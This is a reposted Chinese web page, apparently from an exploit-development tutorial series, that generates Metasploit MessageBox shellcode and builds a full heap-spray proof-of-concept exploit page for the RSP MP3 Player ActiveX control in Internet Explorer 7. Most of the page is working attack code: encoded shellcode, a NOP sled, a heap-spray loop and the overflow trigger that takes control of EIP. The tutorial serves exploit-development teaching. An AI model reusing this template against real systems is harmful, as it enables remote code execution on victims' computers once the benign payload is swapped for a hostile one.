文章来源于网络收集而来，版权归原创者所有，如有侵权请及时联系！

Shellcode+游戏结束

发布于 2025-01-03 23:32:54 字数 5474 浏览 0 评论 0 收藏 0

我们首先生成一些可用的 shellcode. 记得将 shellcode 编码为 javascript 小端字节序

root@bt:~# msfpayload windows/messagebox O

     Name: Windows MessageBox
   Module: payload/windows/messagebox
  Version: 13403
   Platform: Windows
     Arch: x86
Needs Admin: No
 Total size: 270
     Rank: Normal

Provided by:
  corelanc0d3r
  jduck <jduck@metasploit.com>

Basic options:
Name    Current Setting   Required  Description
----    ---------------   --------  -----------
EXITFUNC  process       yes     Exit technique: seh, thread, process, none
ICON    NO        yes     Icon type can be NO, ERROR, INFORMATION, WARNING or QUESTION
TEXT    Hello, from MSF!  yes     Messagebox Text (max 255 chars)
TITLE   MessageBox    yes     Messagebox Title (max 255 chars)

Description:
  Spawns a dialog via MessageBox using a customizable title, text & 
  icon


root@bt:~# msfpayload windows/messagebox text='Oww Snap!' title='b33f' O

     Name: Windows MessageBox
   Module: payload/windows/messagebox
  Version: 13403
   Platform: Windows
     Arch: x86
Needs Admin: No
Total size: 255
     Rank: Normal

Provided by:
  corelanc0d3r
  jduck <jduck@metasploit.com>

Basic options:
Name    Current Setting  Required  Description
----    ---------------  --------  -----------
EXITFUNC  process      yes     Exit technique: seh, thread, process, none
ICON    NO         yes     Icon type can be NO, ERROR, INFORMATION, WARNING or QUESTION
TEXT    Oww Snap!    yes     Messagebox Text (max 255 chars)
TITLE   b33f       yes     Messagebox Title (max 255 chars)

Description:
  Spawns a dialog via MessageBox using a customizable title, text & 
  icon


root@bt:~# msfpayload windows/messagebox text='Oww Snap!' title='b33f' R| msfencode -t js_le[*] x86/shikata_ga_nai succeeded with size 282 (iteration=1)

%u22bb%ua82f%udb56%ud9dd%u2474%u58f4%uc931%u40b1%u5831%u0315%u1558%uc083% ue204%uf6d7%ucd43 %u7dce%u06b0%uafc1%u910a%u9910%ud50f%u2923%u9f5b%uc2cf%u7c2d%u9244%uf7d9%u3 b24%u3151%u74e0 %u4b7d%ud2e3%u627c%u04fc%u0f1e%ue36e%u84fb%ud72b%ucf88%u5f9b%u058e%ud550%u 5288%uca3c%u8fa9 %u3e23%uc4e3%ub497%u34f2%u35e6%u08c5%u66f4%u49a2%u7070%u866a%u7f75%uf2ab%u 4471%u214f%uce51 %ua24e%u14fb%u5e90%udf9d%ueb9e%ubaea%uea82%ub107%u67bf%u2ed6%u3336%ub2fc%u 7f28%uc24e%uab83 %u3627%u915a%u375f%u1813%u1573%ubb44%u6574%u4d6b%u9ecf%u302f%u7c17%u4a3c% ua5bb%ubc91%u5a4d %uc2ea%ue0d8%u551d%u86b6%ue43d%u642e%uc80c%ue2ca%u6705%u8177%udb6d%u6f53% u02e7%u90cd%ucea2 %uac78%u741d%u93d2%u36d3%uc8a5%u14cf%u9141%u66f0%u3a6e%ub957%u9bb0%udb0f% ue883%u2aa9%u8638 %u696a%u1eba%u1971%u78e3%ufa56%u2b8b%u9bf8%ua43b%u2b4b%u14cc%u1a65%u19ba% u95a1%u4033%u7798 %ud011%u258a%u066a%u0a1d%u58c4%u820b

好的，整理下最后的 POC. 增加一些注释和前面创建的堆喷射. 最终的堆喷射脚本如下：

<!--------------------------------------------------------------------------------
// Exploit: RSP MP3 Player OCX ActiveX Heap Spray                 //
// Author: b33f - http://www.fuzzysecurity.com/                 //
// OS: Tested on XP PRO SP3                           //
// Browser: IE 7.00                               //
// Software: http://www.exploit-db.com/wp-content/themes/exploit/applications/  //
//       16fc339cccdb34dd45af52de8c046d8d-rsp_mp3_ocx_3.2.0_sw.zip      //
//------------------------------------------------------------------------------//
// This exploit was created for Part 8 of my Exploit Development tutorial     //
// series => http://www.fuzzysecurity.com/tutorials/expDev/8.html         //
--------------------------------------------------------------------------------->
 
<html>
  <head>
  <object id="Oops" classid='clsid:3C88113F-8CEC-48DC-A0E5-983EF9458687'></object>
  </head>
  <body>
  <script>
   
  var Shellcode = unescape(   
  '%u22bb%ua82f%udb56%ud9dd%u2474%u58f4%uc931%u40b1%u5831%u0315%u1558%uc08 3%ue204%uf6d7%ucd43'+   
  '%u7dce%u06b0%uafc1%u910a%u9910%ud50f%u2923%u9f5b%uc2cf%u7c2d%u9244%uf7d9 %u3b24%u3151%u74e0'+   
  '%u4b7d%ud2e3%u627c%u04fc%u0f1e%ue36e%u84fb%ud72b%ucf88%u5f9b%u058e%ud550 %u5288%uca3c%u8fa9'+   
  '%u3e23%uc4e3%ub497%u34f2%u35e6%u08c5%u66f4%u49a2%u7070%u866a%u7f75%uf2ab %u4471%u214f%uce51'+   
  '%ua24e%u14fb%u5e90%udf9d%ueb9e%ubaea%uea82%ub107%u67bf%u2ed6%u3336%ub2fc %u7f28%uc24e%uab83'+   
  '%u3627%u915a%u375f%u1813%u1573%ubb44%u6574%u4d6b%u9ecf%u302f%u7c17%u4a3c %ua5bb%ubc91%u5a4d'+   
  '%uc2ea%ue0d8%u551d%u86b6%ue43d%u642e%uc80c%ue2ca%u6705%u8177%udb6d%u6f5 3%u02e7%u90cd%ucea2'+   
  '%uac78%u741d%u93d2%u36d3%uc8a5%u14cf%u9141%u66f0%u3a6e%ub957%u9bb0%udb0f %ue883%u2aa9%u8638'+   
  '%u696a%u1eba%u1971%u78e3%ufa56%u2b8b%u9bf8%ua43b%u2b4b%u14cc%u1a65%u19b a%u95a1%u4033%u7798'+   
  '%ud011%u258a%u066a%u0a1d%u58c4%u820b');    
  
  var NopSlide = unescape('%u9090%u9090'); 
   
  var headersize = 20;
  var slack = headersize + Shellcode.length;
   
  while (NopSlide.length < slack) NopSlide += NopSlide;
  var filler = NopSlide.substring(0,slack);
  var chunk = NopSlide.substring(0,NopSlide.length - slack);
   
  while (chunk.length + slack < 0x40000) chunk = chunk + chunk + filler;
  var memory = new Array();
  for (i = 0; i < 500; i++){ memory[i] = chunk + Shellcode }
   
  // Trigger crash => EIP = 0x06060606
  pointer='';
  for (counter=0; counter<=1000; counter++) pointer+=unescape("%06");
  Oops.OpenFile(pointer);
   
  </script>
</body>
</html>

分享到QQ

分享到微博

如果你对这篇内容有疑问，欢迎到本站社区发帖提问参与讨论，获取更多帮助，或者扫码二维码加入 Web 技术交流群。

发布评论

需要登录才能够评论，你可以免费注册一个本站的账号。

列表为空，暂无数据

Shellcode+游戏结束

如果你对这篇内容有疑问，欢迎到本站社区发帖提问 参与讨论，获取更多帮助，或者扫码二维码加入 Web 技术交流群。

发布评论

如果你对这篇内容有疑问，欢迎到本站社区发帖提问参与讨论，获取更多帮助，或者扫码二维码加入 Web 技术交流群。